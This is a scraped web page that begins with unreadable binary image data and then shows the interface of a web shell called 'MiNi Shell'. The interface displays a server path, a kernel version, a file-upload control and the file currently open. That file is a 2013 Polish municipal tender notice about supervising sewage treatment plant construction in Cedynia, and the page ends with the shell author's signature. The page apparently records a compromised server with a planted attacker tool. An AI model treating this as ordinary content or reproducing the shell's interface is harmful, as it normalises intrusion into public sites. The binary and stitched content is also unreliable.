JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130909/181939-N-2013.html

<p class="kh_header"><b>Cedynia: Wykonywanie usług w zakresie pełnienia nadzoru inwestorskiego nad zadaniem inwestycyjnym: Budowa przydomowych oczyszczalni ścieków na terenie gminy Cedynia</b><br>
<b>Numer ogłoszenia: 181939 - 2013; data zamieszczenia: 09.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cedynia , Pl. Wolności 1, 74-520 Cedynia, woj. zachodniopomorskie, tel. 91 41 44 006, faks 91 41 44 162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cedynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług w zakresie pełnienia nadzoru inwestorskiego nad zadaniem inwestycyjnym: Budowa przydomowych oczyszczalni ścieków na terenie gminy Cedynia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie czynności nadzoru inwestorskiego zgodnie z obowiązującymi przepisami regulującymi tę problematykę m. in. ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. t. j. z 2010 r. Nr 243, poz. 1623 z późn. zm. ) dla następującego zadania:
Budowa przydomowych oczyszczalni ścieków na terenie gminy Cedynia
którego zakres obejmuje:
Budowa przydomowych oczyszczalni ścieków na terenie gminy Cedynia:
- Bielinek 9 szt. w tym 2 biologiczne i 7 naturalnych oczyszczalni ścieków,
- Cedynia 1 szt. w tym 1 biologiczna oczyszczalnia ścieków,
- Czachów 7 szt. w tym 4 biologiczne i 3 naturalne oczyszczalnie ścieków,
- Golice 2 szt. w tym 1 biologiczna i 1 naturalna oczyszczalnia ścieków,
- Lubiechów Dolny 16 szt. w tym 2 biologiczne i 14 naturalnych oczyszczalni ścieków,
- Lubiechów Górny 7 szt. w tym 3 biologiczne i 4 naturalne oczyszczalnie ścieków,
- Orzechów 11 szt. w tym 2 biologiczne i 9 naturalnych oczyszczalni ścieków,
- Osinów Dolny 1 szt. w tym 1 biologiczna oczyszczalnia ścieków,
- Piasek 30 szt. w tym 7 biologicznych i 23 naturalne oczyszczalnie ścieków,
- Siekierki 2 szt. w tym 1 biologiczna i 1 naturalna oczyszczalnia ścieków,
- Stara Rudnica 6 szt. w tym 1 biologiczna i 5 naturalnych oczyszczalni ścieków,
- Stary Kostrzynek 2 szt. w tym 2 biologiczne oczyszczalnie ścieków,
- Żelichów 7 szt. w tym 1 biologiczna i 6 naturalnych oczyszczalni ścieków,
w następującym zakresie:
1. Zleceniobiorca odpowiedzialny jest za kierowanie, nadzorowanie i administrowanie robotami, oraz pomoc techniczną dla Zleceniodawcy.
2. Zleceniobiorca winien wykonywać swoje obowiązki w ścisłej współpracy ze Zleceniodawcą
A. PODCZAS WDRAŻANIA KONTRAKTU NA ROBOTY:
- kontrolowanie nadzorowanego obiektu co najmniej 1 raz w tygodniu pod względem zgodności wykonanych prac z dokumentacją; z przeprowadzonej kontroli należy dokonać wpis do dziennika budowy (jeżeli jest wymagany dla danej inwestycji) lub sporządzić notatkę, w uzasadnionych przypadkach sporządzić dodatkowy protokół dla Zamawiającego,
- kontrolowanie nadzorowanego obiektu co najmniej 1 raz dziennie na etapie wykonywania prac ulegających zakryciu oraz dokonywanie stosownych wpisów z kontroli w dzienniku budowy lub sporządzenie notatki z kontroli,
- utrzymanie na bieżąco łączności i zdawanie sprawozdań comiesięcznych Zamawiającemu z przebiegu realizacji zadania, 
- monitorowanie i kontrola kontraktu na roboty pod względem rzeczowym, finansowym i organizacyjnym,
- informowanie zamawiającego o wszystkich problemach istniejących i przewidywanych razem ze sposobami ich rozwiązywania lub działaniami koordynującymi mającymi na celu usuwanie takich problemów,
- informowanie na bieżąco Zamawiającego o każdym odstępstwie od dokumentacji
- dokonywanie systematycznie wpisów do dziennika budowy; w przypadku nie udostępnienia dziennika budowy przez wykonawcę robót budowlanych, niezwłocznie powiadomienie o tym Zamawiającego poprzez sporządzenie stosownego protokołu,
- współpraca z zamawiającym w egzekwowaniu postanowień kontraktu na roboty,
- nadzór, kontrola i zapobieganie, monitorowanie i składanie sprawozdań dotyczących między innymi rzeczowego i finansowego postępu robót.
- sprawdzania kalkulacji szczegółowych lub kosztorysów różnicowych przedkładanych przez wykonawcę robót budowlanych, sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót i przedkładanie ich w terminie 10 dni do realizacji Zamawiającemu,
- współpraca z zamawiającym w administrowaniu i zarządzaniu projektem,
- dokonywanie odbiorów częściowych i odbioru końcowego wykonanych robót,
- sprawdzenie kompletności dokumentów odbiorowych przed podpisaniem protokółu odbioru końcowego,
-  Wszystkie inne czynności i zadania nie wymienione w niniejszym zakresie zadań, które okażą się konieczne dla prawidłowej realizacji kontraktu na roboty oraz zabezpieczenia interesów zamawiającego.                 
 B. PODCZAS OKRESU ZGŁASZANIA WAD:
Po skończeniu robót, podczas okresu zgłaszania wad, Inspektor Nadzoru będzie uczestniczył w nadzorowaniu inspekcji gwarancyjnych, końcowych akceptacji i rozwiązywania sporów. W szczególności, zadania te zawierają: 
- Regularne inspekcje wad usuwanych przez Wykonawcę,
- Wydanie świadectwa wykonania i sprawdzenie oświadczenia wykonawcy,
- Uczestnictwo w rozwiązywaniu sporów zgodnie z warunkami kontraktu,
- Zarekomendowanie zwrotu zabezpieczeń z tytułu należytego wykonania robót oraz  gwarancji i rękojmi z wyszczególnieniem kwoty zatrzymanej po terminie,
- Zgłoszenie wad,
- Uczestniczenie w pracach wynikających z obowiązków gwarancyjnych wykonawców robót budowlanych oraz rękojmi za wady wykonanych robót,
- Dokonanie odbioru ostatecznego po upływie okresu gwarancji ustalonego w umowie z Wykonawcą robót budowlanych.
  C. ODPOWIEDZIALNOŚĆ INSPEKTORA NADZORU:
      Inspektor Nadzoru będzie odpowiedzialny za zarządzanie, nadzorowanie i administrowanie robót kontraktowych zgodnie z poniższym szczegółowym opisem obowiązków i upoważnień Inspektora.
Od Inspektora Nadzoru będzie się wymagało, aby:
1. Administrował i zarządzał robotami kontraktowymi  realizowanymi zgodnie z w warunkami kontraktu na budowę.
2. Monitorował postęp prac włącznie ze składaniem z nich raportu, w którym będą brane pod  uwagę zarówno wskaźniki fizyczne jak i finansowe,
3. Zabezpieczył profesjonalny i kompletny nadzór inwestorski nad prowadzonymi robotami,
4. Nadzorował i akceptował próby, badania i rozruchy technologiczne,
5. Zapewnił zgodność wykonanych robót z wymaganiami technicznymi i warunkami określonymi w kontrakcie,
6. Zleceniobiorca  zobowiązany jest zatwierdzić faktury wystawione przez Wykonawcę własnoręcznym podpisem, że dokonał weryfikacji pod względem nadzoru inwestorskiego 
7. Zleceniobiorca zobowiązany do sprawdzania pod względem nadzoru inwestorskiego kosztorysów powykonawczych na wykonane roboty.
8. Inspektor Nadzoru jest w granicach niniejszej umowy przedstawicielem Zleceniodawcy, jako Zamawiającego w ramach umowy zawartej z Wykonawcą o wykonanie robót wymienionych w § 1 niniejszej umowy
9. Inspektor Nadzoru zobowiązuje się składać Zleceniodawcy lub osobie upoważnionej przez Zleceniodawcę i na jej żądanie, pisemne sprawozdanie z przebiegu robót w terminie trzech dni od zgłoszenia żądania . 

Po podpisaniu umowy Zamawiający przekaże Inspektorowi następujące dokumenty:
1. umowa z wykonawcą robót wraz z harmonogramem rzeczowo - finansowym,
2. ofertę wykonawcy,
3. kosztorysy ofertowe,
4. projekt wykonawczy,
5. specyfikacje techniczną wykonania i odbioru robót.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.52.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
 a) Wykonawca musi wykazać iż: nadzorował minimum jedno zadanie związane z - budową co najmniej 50 naturalnych lub/i biologicznych przydomowych oczyszczalni ścieków; lub - budowie sieci kanalizacyjnej lub wodociągowej lub - budowie/modernizacji oczyszczalni ścieków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
w zakresie zadania
Inspektor Nadzoru robót sanitarnych  musi spełniać następujące wymagania: 
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych
Inspektor Nadzoru robót elektrycznych musi spełniać następujące wymagania: 
- posiada uprawnienia budowlane do nadzorowania i kierowania robotami budowlanymi w specjalności elektrycznej ,  
Osoby, które będą uczestniczyć w wykonaniu zamówienia muszą posiadać co najmniej 3 lata doświadczenia zawodowego w nadzorach inwestorskich w zakresie wymaganej specjalności, w tym co  najmniej 2-letnią praktykę zawodową w nadzorowaniu robót budowlanych prowadzonych na obiektach odpowiadających przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu, formularz oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w następującym zakresie:
1)	zmiany osób sprawujących czynności określone w §5 ust. 2 umowy i wskazanych w ofercie na uzasadniony wniosek wykonawcy zaakceptowany przez Zamawiającego lub na żądanie Zamawiającego jeżeli nie wywiązują się one z nałożonych obowiązków;
2)	przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest:
a)	wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności;
b)	uzyskania zgody Instytucji Zarządzającej na przedłużenie terminu realizacji projektu z przyczyn obecnie niemożliwych do określenia,
c)	szczególnie niesprzyjającymi warunkami atmosferycznymi;
d)	koniecznością dokonania istotnych zmian w dokumentacji projektowej na wniosek stron;
e)	wystąpieniem siły wyższej;
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.cedynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miejski w Cedyni
Plac Wolności 1
74-520 Cedynia
Pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 09:00, miejsce: Urzad Miejski w Cedyni
Plac Wolności 1
74-520 Cedynia
Pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rolnego na rzecz  Rozwoju Obszarów Wiejskich (EFRROW)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com